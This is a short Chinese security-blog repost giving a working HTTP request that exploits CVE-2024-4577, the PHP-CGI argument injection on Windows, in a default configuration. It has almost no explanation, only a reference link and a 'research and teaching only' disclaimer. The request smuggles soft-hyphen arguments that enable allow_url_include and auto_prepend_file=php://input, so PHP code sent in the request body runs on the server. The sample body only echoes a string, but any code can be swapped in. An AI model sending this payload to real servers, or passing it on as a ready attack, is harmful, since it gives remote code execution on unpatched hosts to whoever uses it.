PHP-CGI-Argument-Injection 默认配置打法[CVE-2024-4577]

admin 2024年6月8日19:33:13评论39 views字数 403阅读1分20秒阅读模式

复现图

PHP-CGI-Argument-Injection 默认配置打法[CVE-2024-4577]
既然MSF Commit公开了打默认配置的方法也就没啥好藏的了,好像有好几个开源项目已经公开了。
GET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1Host: 127.0.0.1<?php echo "L0ne1y";?>

PHP-CGI-Argument-Injection 默认配置打法[CVE-2024-4577]

参考
https://serverfault.com/questions/925615/how-to-secure-servers-from-a-cgi-bin-php-post-request-attack

原文始发于微信公众号(安全之道):PHP-CGI-Argument-Injection 默认配置打法[CVE-2024-4577]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月8日19:33:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP-CGI-Argument-Injection 默认配置打法[CVE-2024-4577]https://cn-sec.com/archives/2831111.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息